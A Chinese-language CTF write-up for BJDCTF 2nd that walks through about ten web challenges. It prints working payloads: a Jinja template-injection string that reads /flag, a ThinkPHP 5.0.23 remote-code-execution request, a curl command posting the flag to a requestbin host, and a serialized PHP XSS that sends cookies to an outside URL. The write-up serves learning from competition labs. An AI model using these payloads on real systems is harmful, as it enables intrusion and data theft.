BJDCTF 2nd Writeup

Posted 20175211lyz

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了BJDCTF 2nd Writeup相关的知识,希望对你有一定的参考价值。

fake google

随便输点什么,url来看不是php,原样回显
技术图片

那很有可能是ssti了,试试{{config}}有回显,直接打个python3的payload试试
{{().__class__.__bases__[0].__subclasses__()[177].__init__.__globals__.__builtins__[‘open‘](‘/flag‘).read()}}
拿到flag

old-hack

进去后看到是tp5,题目名字又叫old-attack,也没扫到源码,估计是现成的洞了。t框架有s参数可以加载模块,随便加点什么,发现开了debug模式,其中可以看到tp的版本。
技术图片

https://www.exploit-db.com/搜tp,还真有个thinkphp 5.0.23(完整版)debug模式下的payload
(post)public/index.php (data)_method=__construct&filter[]=system&server[REQUEST_METHOD]=touch%20/tmp/xxx
直接拿来用完事
技术图片

duangShell

这道题我做的时候很简单,.index.php.swpvim -r复原一下,flag就在根目录
curl http://requestbin.xxx -X POST -d "`head /flag`"就送flag了,但是后来学弟做的时候flag怎么都找不到了,再后来我也没找到就没管。。

简单注入

过滤了引号没过滤,postusername=&password=||1#发现回显不一样了,布尔盲注就完了,select被过滤了,不过不要紧,直接substr(password,1,1)然后拿这个登录就可以拿到flag了

假猪套天下第一

套,就硬套
开局假登录,hint在302界面,去访问L0g1n.php
如下依次改时间戳,加header就行了(这个Commodore是真的坑)
技术图片

Schro?dinger

这题二血
源码hintNote : Remenmber to remove test.php!,打开test.php,和index.php的功能正好相符合,那就input。下面那个动效我感觉是js做的,源代码里面也是js调用几个奇怪的函数,但是只引入了jQuery.js,说明这个jQuery.js有问题的,打开一看果然是个自制的,其中跟成功率有关的是

function script(sub){
	var rate = sub;
	var t = setInterval(function(){
		rate += 1;
		span4.innerText = Math.log(rate) * 4.7;
	}, 1000);
}

看了好半天,发现cookie里面有个奇怪的东西dXNlcg=MTU4NDg4ODIyNg%3D%3D,base64解码后看起来是个时间戳,随便改了试试看,发现成功率变了,再看源代码,发现script的参数变大了,按这个思路把时间回调就行,直接狠一点,改成MA==,就可以得到password。

然而这个password他不是个password,我各种姿势试了半天,都没成功,后来反应过来是个b站av号,后面@时间戳应该是评论的时间,找到flag后我情不自禁在留言区真情流露

xss之光

git源码泄露,就两行,是个反序列化,结合题目名字,应该是php原生类与反序列化xss,那就是这样了

<?php
$a = new Exception("<script>window.location.href="http://http.requestbin.buuoj.cn/1nrks0e1?cookie="+escape(document["cookie"])</script>");
$b = serialize($a);
echo urlencode($b);

elementmaster

脑洞题,不想说了,<p hidden id>,hex2bin后是元素Po,把元素周期表跑一遍就完了

文件探测

有意思的题来了。首页源代码里hint,BJDCTF传统艺能,那就是hint藏header,没话说,进入home.php
file参数,很自然试一下伪协议读文件,能读到system.phphome.php的源码。读源码,home文件包含过滤很死,没什么机会,但是还过滤了admin,尝试一下发现有admin.php(我就是卡这里卡了一晚上)。system.phpfile_get_contents不能读任意文件,只能用来ssrf,用来访问http://127.0.0.1/admin#,用#锚点来绕过后面的脏字符。sprintf("$url method&content_size:$method%d", $detect)只要让$method=‘%s%‘就能输出字符串,然后读到admin.php源码

admin.php下面随机是基本真随机,没法爆破。但是其实有个逻辑问题

if (isset($_GET[‘decrypt‘])) {
    $decr = $_GET[‘decrypt‘];
    if (Check()){
        $data = $_SESSION[‘secret‘];
        include ‘flag_2sln2ndln2klnlksnf.php‘;
        $cipher = aesEn($data, ‘y1ng‘);
        if ($decr === $cipher){
            echo WHAT_YOU_WANT;
        } else {
            die(‘爬‘);
        }
    } else{
        header("Refresh:0.1;url=index.php");
    }
} else {
    //I heard you can break PHP mt_rand seed
    mt_srand(rand(0,9999999));
    $length = mt_rand(40,80);
    $_SESSION[‘secret‘] = bin2hex(random_bytes($length));
}

那我如果不带session,直接带decrypt参数访问,不就不存在这个$_SESSION[‘secret‘]了吗?

<?php
function aesEn($data, $key)
{
    $method = ‘AES-128-CBC‘;
    $iv = md5("174.0.222.75",true);
    return  base64_encode(openssl_encrypt($data, $method,$key, OPENSSL_RAW_DATA , $iv));
}

echo aesEn(‘‘, ‘y1ng‘);

生成poc删掉cookie里的PHPSESSID直接传就行

EasyAspDotNet

这题一血
这题是HITCON 2018: Why so Serials?改的,实际上基本原题,参考HITCON 2018: Why so Serials? Write-upHITCON CTF 2018 - Why so Serials? Writeup
用后一篇文章的poc在本地搭个环境,把shellcode改成第一篇文章中的powershell反弹shell命令,然后再题目页面把html中的viewstate和它的签名换成我们本地生成的,运行就可以getshell。

其实真的不难,只是我没见过,具体原理我还要再研究研究

以上是关于BJDCTF 2nd Writeup的主要内容,如果未能解决你的问题,请参考以下文章

CTF-Pwn-[BJDCTF 2nd]diff

CTF-Pwn-[BJDCTF 2nd]diff

[BJDCTF 2nd]文件探测

[BJDCTF 2nd]简单注入

[BJDCTF 2nd]简单注入

[BJDCTF 2nd]简单注入